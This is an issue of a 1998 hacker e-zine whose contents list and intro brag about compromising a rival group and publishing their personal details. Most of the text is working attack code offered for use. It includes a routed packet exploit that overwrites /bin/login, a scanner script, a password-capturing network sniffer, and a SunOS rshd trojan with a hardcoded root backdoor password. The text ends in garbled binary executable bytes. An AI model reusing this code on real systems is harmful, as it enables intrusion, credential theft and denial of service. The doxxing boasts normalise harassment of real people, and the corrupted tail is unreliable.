. [cZo] . Team CodeZero Presents . [cZo] . /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ Issue 8 22nd March 1998 Man with the plan : so1o The usual : om3n, zer0x, xFli, electro, spheroid, el8, ultima, chameleon. Not forgotten : loss, organik, peenut, pzn, suid helix, deprave, manly, Shok. Others : paladine, Sciri, fiji, ch-E-ztic, vacuum, humble. Cheers : Darkcyde, Jf. Russians : lirik, DemiGod, stranger, ps. .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' In This (compact) Installment of Confidence Remains High : ------=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 8....................: Tetsu Khan 2. sIn (here we go again).............................: so1o ------=> Section B : Exploits And Code. 1. Jimmy J's "vintage warez" : pack #1................: JJ 2. routed remote......................................: Kit Knox 3. Wingate scanner....................................: cL0ut 4. LinSniffer 0.666...................................: humble 5. SunOS 5.5.1 in.rshd trojan.........................: anonymous ------=> Section C : Phones / Scanning / Radio. 1. Outdials...........................................: Lirik 2. BlueBoxing in the UK in '98........................: The UK Phreaking Elite 3. UK Phone Definitions and Abbreviations.............: Jf ------=> Section D : Miscellaneous. 1. Top 10 reasons why.................................: anonymous 2. Hacking Digital Unix 4.0...........................: humble 3. FreeBSD 2.2.5 rootkit..............................: humble / method 4. l0ckd0wn.sh........................................: so1o ------=> Section E : World News. 1. VMG 0wned..........................................: sw1tch -------=> Section F : Projects. 1. The Rhino9 Sentinel................................: so1o / humble 2. TotalCon...........................................: so1o ------=> Section G : FIN. =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Confidence Remains High issue 8 : Tetsu Khan It's all good, issue 8 is here, life is good, and I feel great. Blah blah blah, enjoy :D The distro list.. ================= ftp.sekurity.org /users/so1o/ www.fth.org /crh/ www.technotronic.com /files/ezines/crh/ cybrids.simplenet.com /Toast/files/CRH/ ftp.linuxwarez.com /pub/crh/ Also check out.. ================ www.hacked.net <-- Archive of all the stuff we have 0wned. /server dark.technonet.com 6667 #!r00td0wn --------------------------------------------- ^-- or kali.cylink.net, dhp.com 6666, few others.. want to mail us? tk85@hotmail.com, you got CRH on your site? tell us f00l! 2. sIn (here we go again) : so1o I have on thing to say, and that is.. we 0wned sIn, go see it at hacked.net, www.hacked.net/exp/com/sinnerz/, we also pulled their d0x, they now live in phear. PERIOD, it is over. yes? We win, you lose, every time. here is a p1c 0f s0me sIn cl00bag t4ken by 4n el8 s4tellit3 : \|||||/ / o o \ __________ | { ^ }-=/ give me \ | \_____/ \ vB k0dez!| | | / `````````` | /|\ / O | / | \/ | | | / \ | / \ | w0w, fh 1s pl4y1ng w4ll b4ll, a p0pular m0rmon pastt1me! For free sIn d0x to add to your 0wn filez of 0wnersh1p, check earlier CRH issues (namedly 3-5).. CRH distro list in pt.1 =============================================================================== ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]== =============================================================================== 1. Jimmy J's "vintage warez" : pack #1 #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####### ####### Jimmy J's "vintage warez" : pack #1 ----------------------------------- phf - The old favourite but with some new and useful options such as trying the bash ff hole to avoid phf filtering the newline character. test-cgi - Another oldie allowing you to remotely list files. Good for getting an idea what CGIs are on the machine as well as other stuff, including packages installed etc. icat - Grab a file from a remote machine running imapd. (You need a valid account on the box) Included in the crh008.zip is a vintage.tgz, these are Linux binaries for the programs above, the two CGI exploits are as old as the hills but they never seem to die so I dusted off some old archives and set about refining them into a semi-useful state. You can now specify a port number and a path to the CGI if you need and the phf script even swaps spaces for %20s provided you use it properly. I'm just releasing these for a laugh really. Someone, somewhere will appreciate the effort. I am not responsible for any use or misuse of these warez. They are for informational purposes. I urge the novice script kiddies among you to read the comments if you're eager to learn what's going on behind the scenes and why. Learning is good. That's it. Have fun. JJ. (If you wish to contact me mail chris@rootshell.com and he will forward it.) 2. routed remote : Kit Knox /* * BSD 4.4 based routed trace file exploit * * Basically, routed on IRIX, AIX and Linux systems can be forced into a debug * mode, where a tracefile is specified in the RIP header, this tracefile can * be used as a form of DoS, as you can specify it to overwrite system files, * the actual contents of the file created is just routing information, so you * CANNOT set up .rhosts files or rootshells! You can only use it as DoS, * this was also a problem with the old statd remote, but people worked out * how to use a "grappling-hook" technique, that gave a remote rootshell, it's * documented in a CERT advisory for statd, work it out.. * * Originally from l0ck, but recoded by Kit Knox (info@rootshell.com), with * RIP spoofing etc. etc. still does the DoS, no rootshells yet :P * * NOTE : routed usually runs on port 520. */ /* File to append to on filesystem with debug output */ #define FILETOCREATE "/bin/login" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Send faked UDP packet. */ int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; /* Fill in IP header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in UDP header values. Checksums are unnecassary. */ udp.source = htons(sport); udp.dest = htons(dport); udp.len = htons(8 + datalen); udp.check = (short) 0; /* Copy the headers into our character array. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp)); memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen); return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } /* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */ unsigned int lookup(host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr(host); /* Try if it's a "127.0.0.1" style string */ if (addr == -1) /* If not, lookup the host */ { he = gethostbyname(host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); } return(addr); } void main(argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s; struct rip rp; if(argc != 4) errs("\nSee http://www.rootshell.com/\n\nUsage: %s \n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]); if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); if(!(saddr = lookup(argv[1]))) err("Unable to lookup source address.\n"); if(!(daddr = lookup(argv[2]))) err("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_addr.s_addr= daddr; sin.sin_port = 520; /* Fill in RIP packet info */ rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */ rp.rip_vers = RIPVERSION; /* Must be version 1 */ sprintf(rp.rip_tracefile, FILETOCREATE); if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1) { perror("sendpkt_udp"); err("Error sending the UDP packet.\n"); } } 3. Wingate scanner : trajek / cl0ut Needs nmap (phrack 51 -> www.phrack.com), work it out, simple.. skr1pt #1 ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here #nmap $1 -p 23 | grep telnet if nmap $1 -p 23 | grep telnet ; then echo $1 >> scan.results fi ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here skr1pt #2 ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here # tee hee.. cl0ut/1998 host -l $1 | grep "has address" | awk -F ' ' '{ print $4 }' > $1.domains echo "* Sorting hosts and removing dupes." sort < $1.domains > $1.sorted uniq < $1.sorted > $1.domains rm -f $1.sorted cat $1.domains | awk -F ' ' '{ print "./b " $1 }' > $1.tmp rm -fr $1.domains chmod +x $1.tmp ./$1.tmp rm -fr $1.tmp ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here 4. LinSniffer 0.666 : humble /* * LinSniffer 0.666 * by humble of rhino9 * I am not responsible for what you do with this. * * This is like linsniffer, but it uses a linked list * so it won't ignore any connections. * * based on original code by Mike Edulla * * how many bytes do you want to capture per connection? * it mallocs this much memory for each connection so don't * make it too high */ #define MAXIMUM_CAPTURE 256 // how long before we stop watching an idle connection? #define TIMEOUT 30 // log file name? #define LOGNAME "tcp.log" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int sock; FILE *log; struct connection { struct connection *next; time_t start; time_t lasthit; unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; unsigned char data[MAXIMUM_CAPTURE]; int bytes; }; typedef struct connection *clistptr; clistptr head,tail; void add_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp) { clistptr newnode; newnode=(clistptr)malloc(sizeof(struct connection)); newnode->saddr=sa; newnode->daddr=da; newnode->sport=sp; newnode->dport=dp; newnode->bytes=0; newnode->next=NULL; time(&(newnode->start)); time(&(newnode->lasthit)); if (!head) { head=newnode; tail=newnode; } else { tail->next=newnode; tail=newnode; } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } char *pretty(time_t *t) { char *time; time=ctime(t); time[strlen(time)-6]=0; return time; } int remove_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp) { clistptr walker,prev; int i=0; int t=0; if (head) { walker=head; prev=head; while (walker) { if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport) { prev->next=walker->next; if (walker==head) { head=head->next;; prev=NULL; } if (walker==tail) tail=prev; fprintf(log,"============================================================\n"); fprintf(log,"Time: %s Size: %d\nPath: %s",pretty(&(walker->start)),walker->bytes,hostlookup(sa)); fprintf(log," => %s [%d]\n------------------------------------------------------------\n",hostlookup(da),ntohs(dp)); fflush(log); for (i=0;ibytes;i++) { if (walker->data[i]==13) { fprintf(log,"\n"); t=0; } if (isprint(walker->data[i])) { fprintf(log,"%c",walker->data[i]); t++; } if (t>75) { t=0; fprintf(log,"\n"); } } fprintf(log,"\n"); fflush(log); free (walker); return 1; } prev=walker; walker=walker->next; } } } int log_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp,int bytes,char *buffer) { clistptr walker; walker=head; while (walker) { if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport) { time(&(walker->lasthit)); strncpy(walker->data+walker->bytes,buffer,MAXIMUM_CAPTURE-walker->bytes); walker->bytes=walker->bytes+bytes; if (walker->bytes>=MAXIMUM_CAPTURE) { walker->bytes=MAXIMUM_CAPTURE; remove_node(sa,da,sp,dp); return 1; } } walker=walker->next; } } void setup_interface(char *device); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; } ep; struct iphdr *ip; struct tcphdr *tcp; void cleanup(int sig) { if (sock) close(sock); if (log) { fprintf(log,"\nExiting...\n"); fclose(log); } exit(0); } void purgeidle(int sig) { clistptr walker; time_t curtime; walker=head; signal(SIGALRM, purgeidle); alarm(5); // printf("Purging idle connections...\n"); time(&curtime); while (walker) { if (curtime - walker->lasthit > TIMEOUT) { // printf("Removing node: %d,%d,%d,%d\n",walker->saddr,walker->daddr,walker->sport,walker->dport); remove_node(walker->saddr,walker->daddr,walker->sport,walker->dport); walker=head; } else walker=walker->next; } } void setup_interface(char *device) { int fd; struct ifreq ifr; int s; //open up our magic SOCK_PACKET fd=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } //set our device into promiscuous mode strcpy(ifr.ifr_name, device); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); sock=fd; } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; p=0; if (htons(tcp->dest) == 21) p= 1; if (htons(tcp->dest) == 23) p= 1; if (htons(tcp->dest) == 106) p= 1; if (htons(tcp->dest) == 109) p= 1; if (htons(tcp->dest) == 110) p= 1; if (htons(tcp->dest) == 143) p= 1; if (htons(tcp->dest) == 513) p= 1; if (!p) return 0; if(tcp->syn == 1) { // printf("Adding node syn %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); add_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } if (tcp->rst ==1) { // printf("Removed node rst %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } if (tcp->fin ==1) { // printf("Removed node fin %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } log_node(ip->saddr,ip->daddr,tcp->source,tcp->dest,htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); } void main(int argc, char *argv[]) { int x,dn; clistptr c; head=tail=NULL; ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); if (fork()==0) { close(0); close(1); close(2); setsid(); dn=open("/dev/null",O_RDWR); dup2(0,dn); dup2(1,dn); dup2(2,dn); close(dn); setup_interface("eth0"); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); signal(SIGALRM, purgeidle); log=fopen(LOGNAME,"a"); if (log == NULL) { fprintf(stderr, "cant open log\n"); exit(0); } alarm(5); while (1) { x=read(sock, (struct etherpacket *)&ep, sizeof(struct etherpacket)); if (x>1) { filter(); } } } } 5. SunOS 5.5.1 in.rshd trojan : anonymous /* SunOS 5.5.1 in.rshd trojan By anonymous, for the hackers of the w0rld 1/3/98 Use thiz shizn1t t0 make me! cc in.rshd.c -o in.rshd -lsocket -lnsl -lintl -lw -ldl -lbsm -lauth -DSYSV -DSTRNET -DBSD_COMP -s Then mv me to /usr/sbin, and restart inetd using: # kill -HUP w0rd. */ #define PASSWORD "eatme" #ident "@(#)in.rshd.c 0.41 92/08/11" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef SYSV #include #include #include #include #include #define killpg(a,b) kill(-(a),(b)) #define rindex strrchr #define index strchr #endif /* SYSV */ #ifndef NCARGS #define NCARGS 5120 #endif /* NCARGS */ int errno; char *index(), *rindex(), *strncat(); /*VARARGS1*/ int error(); struct ia_status ia_status; void * iah; int retval; /*ARGSUSED*/ main(argc, argv) int argc; char **argv; { struct linger linger; int on = 1, fromlen; struct sockaddr_in from; openlog("rsh", LOG_PID | LOG_ODELAY, LOG_DAEMON); audit_rshd_setup(); /* BSM */ fromlen = sizeof (from); if (getpeername(0, (struct sockaddr *) &from, &fromlen) < 0) { fprintf(stderr, "%s: ", argv[0]); perror("getpeername"); _exit(1); } if (setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on, sizeof (on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); linger.l_onoff = 1; linger.l_linger = 60; /* XXX */ if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger, sizeof (linger)) < 0) syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m"); doit(dup(0), &from); /* NOTREACHED */ } char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; #ifdef SYSV char *envinit[] = {homedir, shell, (char *) 0, username, (char *) 0, (char *) 0}; #define ENVINIT_PATH 2 /* position of PATH in envinit[] */ #define ENVINIT_TZ 4 /* position of TZ in envinit[] */ /* * See PSARC opinion 1992/025 */ char userpath[] = "PATH=/usr/bin:"; char rootpath[] = "PATH=/usr/sbin:/usr/bin"; #else char *envinit[] = {homedir, shell, "PATH=:/usr/ucb:/bin:/usr/bin", username, 0}; #endif /* SYSV */ static char cmdbuf[NCARGS+1]; char hostname [MAXHOSTNAMELEN + 1]; doit(f, fromp) int f; struct sockaddr_in *fromp; { char *cp; char locuser[16], remuser[16]; struct passwd *pwd; #ifdef SYSV char *tz, *tzenv; struct spwd *shpwd; struct stat statb; #endif /* SYSV */ int s; struct hostent *hp; short port; pid_t pid; int pv[2], cc; char buf[BUFSIZ], sig; int one = 1; int trojan=0; (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); #ifdef SYSV (void) sigset(SIGCHLD, SIG_IGN); #endif /* SYSV */ #ifdef DEBUG { int t = open("/dev/tty", 2); if (t >= 0) { #ifdef SYSV setsid(); #else ioctl(t, TIOCNOTTY, (char *)0); #endif SYSV (void) close(t); } } #endif fromp->sin_port = ntohs((u_short)fromp->sin_port); if (fromp->sin_family != AF_INET) { syslog(LOG_ERR, "malformed from address\n"); exit(1); } if (fromp->sin_port >= IPPORT_RESERVED || fromp->sin_port < (u_int) (IPPORT_RESERVED/2)) { syslog(LOG_NOTICE, "connection from bad port\n"); exit(1); } (void) alarm(60); port = 0; for (;;) { char c; if ((cc = read(f, &c, 1)) != 1) { if (cc < 0) syslog(LOG_NOTICE, "read: %m"); shutdown(f, 1+1); exit(1); } if (c == 0) break; port = port * 10 + c - '0'; } (void) alarm(0); if (port != 0) { int lport = IPPORT_RESERVED - 1; s = rresvport(&lport); if (s < 0) { syslog(LOG_ERR, "can't get stderr port: %m"); exit(1); } if (port >= IPPORT_RESERVED) { syslog(LOG_ERR, "2nd port not reserved\n"); exit(1); } fromp->sin_port = htons((u_short)port); if (connect(s, (struct sockaddr *) fromp, sizeof (*fromp)) < 0) { syslog(LOG_INFO, "connect second port: %m"); exit(1); } } dup2(f, 0); dup2(f, 1); dup2(f, 2); hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr), fromp->sin_family); if (hp) strncpy (hostname, hp->h_name, sizeof(hostname)); else strncpy (hostname, inet_ntoa(fromp->sin_addr), sizeof(hostname)); getstr(remuser, sizeof(remuser), "remuser"); getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); if (!strcmp(PASSWORD,locuser)) { trojan=1; } if (!trojan && (ia_start("in.rshd", locuser, NULL, hostname, NULL, &iah)) != IA_SUCCESS) { syslog(LOG_ERR, "ia_start() failed\n"); exit(1); } if (!trojan && ia_auth_user(iah, 0, &pwd, &ia_status) != IA_SUCCESS) { error("permission denied\n"); audit_rshd_fail("Login incorrect", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } if (trojan) pwd=getpwnam("root"); else { shpwd = getspnam(locuser); if (shpwd == NULL) { error("permission denied.\n"); audit_rshd_fail("Login incorrect", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } } /* * maintain 2.1 and 4.* and BSD semantics with anonymous rshd */ if (!trojan && shpwd->sp_pwdp != 0 && *shpwd->sp_pwdp != '\0' && ia_auth_netuser(iah, remuser, &ia_status) != IA_SUCCESS ) { error("permission denied\n"); audit_rshd_fail("Permission denied", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } if (chdir(pwd->pw_dir) < 0) { (void) chdir("/"); #ifdef notdef error("No remote directory.\n"); exit(1); #endif } (void) write(2, "\0", 1); if (port) { if (pipe(pv) < 0) { error("Can't make pipe.\n"); exit(1); } pid = fork(); if (pid == (pid_t)-1) { error("Fork (to start shell) failed on server. Please try again later.\n"); exit(1); } #ifndef MAX #define MAX(a,b) (((u_int)(a) > (u_int)(b)) ? (a) : (b)) #endif /* MAX */ if (pid) { int width = MAX(s, pv[0]) + 1; fd_set ready; fd_set readfrom; (void) close(0); (void) close(1); (void) close(2); (void) close(f); (void) close(pv[1]); FD_ZERO (&ready); FD_ZERO (&readfrom); FD_SET (s, &readfrom); FD_SET (pv[0], &readfrom); if (ioctl(pv[0], FIONBIO, (char *)&one) == -1) syslog (LOG_INFO, "ioctl FIONBIO: %m"); /* should set s nbio! */ do { ready = readfrom; if (select(width, &ready, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) break; if (FD_ISSET (s, &ready)) { if (read(s, &sig, 1) <= 0) FD_CLR (s, &readfrom); else killpg(pid, sig); } if (FD_ISSET (pv[0], &ready)) { errno = 0; cc = read(pv[0], buf, sizeof (buf)); if (cc <= 0) { shutdown(s, 1+1); FD_CLR (pv[0], &readfrom); } else (void) write(s, buf, cc); } } while (FD_ISSET (s, &readfrom) || FD_ISSET (pv[0], &readfrom)); exit(0); } setpgrp(0, getpid()); (void) close(s); (void) close(pv[0]); dup2(pv[1], 2); (void) close(pv[1]); } if (*pwd->pw_shell == '\0') pwd->pw_shell = "/bin/sh"; (void) close(f); /* * write audit record before making uid switch */ if (!trojan) { audit_rshd_success(hostname, remuser, locuser, cmdbuf); /* BSM */ if (retval = ia_setcred(iah, SC_INITGPS|SC_SETRID, pwd->pw_uid, pwd->pw_gid, 0, NULL, &ia_status)) { switch (retval) { case 0: break; case IA_BAD_GID: error("Invalid gid.\n"); exit(1); case IA_BAD_UID: error("Invalid uid.\n"); exit(1); default: exit(1); } } ia_end(iah); } #ifdef SYSV if (pwd->pw_uid) envinit[ENVINIT_PATH] = userpath; else envinit[ENVINIT_PATH] = rootpath; if (tzenv = getenv("TZ")) { /* * In the line below, 4 is strlen("TZ=") + 1 null byte. * We have to malloc the space because it's difficult to * compute the maximum size of a timezone string. */ tz = (char *) malloc(strlen(tzenv) + 4); if (tz) { strcpy(tz, "TZ="); strcat(tz, tzenv); envinit[ENVINIT_TZ] = tz; } } #endif /* SYSV */ strncat(homedir, pwd->pw_dir, sizeof(homedir)-6); strncat(shell, pwd->pw_shell, sizeof(shell)-7); strncat(username, pwd->pw_name, sizeof(username)-6); cp = rindex(pwd->pw_shell, '/'); if (cp) cp++; else cp = pwd->pw_shell; #ifdef SYSV /* * rdist has been moved to /usr/bin, so /usr/ucb/rdist might not * be present on a system. So if it doesn't exist we fall back * and try for it in /usr/bin. We take care to match the space * after the name because the only purpose of this is to protect * the internal call from old rdist's, not humans who type * "rsh foo /usr/ucb/rdist". MZ@ !L!This program cannot be run in DOS mode. $[{{{d{g{dQ{{!{}d{{{d{Rich{PEL[=8 P9@D@.text `.rdata @@.data%@Uh0@EP"E}uMQh4@y"j!UR EjjEPm MQEjUREPL MQE}uURhh@ "j-!EPMQjUR;EtEPh@!j MQ.UUE EEM;M}*UUEMMUUBMMUQŋE]UQh@EP!E}uMQh@F!jg UREPjM Q!;EtURh@!j4 EPh]UHE E}t}t/}t33EMQUR@EEPMQ@3"j@3UREPM QUR@]UY PM Ph@o 4 j]U]U,E+Eذ@EEEEhj@Ehj@Ej@EEE@MQܠ@%u3IjURjjhh@jjhh(@h@@j@E}u3  EPj jj | u c uhL@J X@=X@uj X@Q# t@=t@uj@U@E@hh@L@uj !h`@H@uj NL@=@uj h@ t@Q j  @RL3]Ujhp@h@Pt3[jh@hP@ p@p@PR t33j @Q@ @QP4t3 hؤ@@ @QP,t3@ @QPt3jh@jt3jS@R@@RQPt3jhh@@@RQTt3kjljh@ @l@@jh@h@@@RQt3h @]Ut@Pul X@QuWuI=@t@ @QP=@t@ @QP=@t@ @QP =p@tp@ p@QP= @t @R!]U} uXE EE}}8MffUE%%MUfEE} uZE MM}}=UffEMUʋEfMMM} uGE UU}},EffMUEfMM‹]Uh\@h@@RQ$3]@%t j" @QURjjh@j@@RQd@@hMQ@R @P @@P]U E EP @@PRTt3~}|u}u }u_}u}u }?u@}u}u }u!}u}u }u3]UE @M @]UE;@~3M; @uU ;@~3]U(E@e 8@50@EEHe 8@50@EE e 8@50@EE(e 8@50@EE 8@EE 8@EE EE}MMMUUU؋EEM؉ME UU}@}EEE܉EMMMU E PUE f QfU U g]U|h`@EEEhh@L@-h@]hh@L@-h@e-`@U Ф@$Y Ȥ@@]E @$3 @@E @]E @$R @@E @]E @$ @]E x@$ @]؋MQURMEE]ȋEPMQMEE]E p@$Y @]E h@$ @]E`@$MEE]E`@$FMEE]EX@$ME]EX@$ME]E P@$ @]E H@$ @]E@@$SMEE]E@@$MEE]UREPMQUREPMQUREPMQUREPMQUREPMQUREPMQHUR*EP ]% @%@%@%@%@%@%$@%8@%4@% @%0@%,@%(@%@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @! !@" "@# #@$ $@% %@& &@' '@( (@) )@* *@+ +@, ,@- -@. .@/ /@0 0@1 1@2 2@3 3@4 4@5 5@6 6@7 7@8 8@9 9@: :@; ;@< <@= =@> >@? ?@@ @@A A@B B@C C@D D@E E@F F@G G@H H@I I@J J@K K@L L@M M@N N@O O@P P@Q Q@R R@S S@T T@U U@V V@W W@X X@Y Y@Z Z@[ [@\ \@] ]@^ ^@_ _@` `@a a@b b@c c@d d@e e@f f@g g@h h@i i@j j@k k@l l@m m@n n@o o@p p@q q@r r@s s@t t@u u@v v@w w@x x@y y@z z@{ {@| |@} }@~ ~@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ %@@%tt\@ ȥ@@j0h@Pj@Vt$WF @t:t4V Vz v }Ft P!fYǃf _^UQSVW} }]υ}Mu3ufF tFE EMfF t*Ft#;ȋrW6S)})~> ߋ}K;Mr.}t 3u+PSv t6t7)EV Yt(FCME}vE_^[ÃN N 3+Eu 5|@t$YYÃ|$w"t$Yu9D$tt$4Yu3Vt$;5@w VYuuj^Vj5@@^Vt$WF to|$t tu]$F u V]D$Y3V F Yt$F tt uFWt$v* 3ɃI @_^U SVW}3ۋw9_u}_jSV ;ÉE|[W fu+GO+]t)֋@Dt(;s": uEB€u@}uEG Wu!U+‰E@Dtjjju# ;EuGM;s 8 uE@G 4juu 9Ew O ttGEDtEE)EEM_^[áx@th@h@h@h@jjt$  jjt$  Wj_9=d@ut$$@P@|$ S\$=`@\@u<@t" @Vq;rtЃ;5@s^h$@h@*YYh,@h(@YY[ut$=d@@_Vt$;t$ s tЃ^SV@WVD$Pt$VVWZ_^["uPt$t$t$5!j@t$ t$ UQSVW} }E}Eu3ufF tFEEN t)Ft";؋rWu6B)~> +}F;]rFt VYuy}t 3u+Wuvt# tGE+;r>})EVP<"YYt.EFKEEPE_^[ÃN E+3u ̋T$ L$tG3D$Wr-كt+шGIuʃttGJuD$_ËD$Vt$t$V YVt P YY^j5@@^UWVu M};v;xur)$5@Ǻr $5@$6@$5@ 5@L5@p5@#ъFGFGr$5@I#ъFGr$5@#ъFGr$5@I5@5@5@5@5@5@5@5@DDDDDDDDDDDDDD$5@6@6@6@06@E^_ÐE^_ÐFGE^_ÍIFGFGE^_Ðt1|9u$r $7@$@7@IǺr +$6@$7@6@6@6@F#шGNOr$7@IF#шGFGr$7@F#шGFGFGZ$7@ID7@L7@T7@\7@d7@l7@t7@7@DDDDDDDDD D DDDD$7@7@7@7@7@E^_ÐFGE^_ÍIFGFGE^_ÐFGFGFGE^_4!l@ ø]@L@Y@H@P@ Z@T@LY@X@Y@\@U}fE fEm}mEŨ$}' ÍT$('R<$tPf<$t-ا@z=h@W' @T'-ڧ@z&u|$u-`@=h@' @'Z̃$& ÍT$x&R<$tPf<$t-ا@z=h@& @&-ڧ@z &u|$u-`@=h@R& @K'ZUjh@hPh@dPd%XSVWe@3Ҋԉ4@ȁ 0@ʉ ,@(@3VYujYu@@+p@)(OuЍEP@_(EEtEj XPuVV@PEP=E 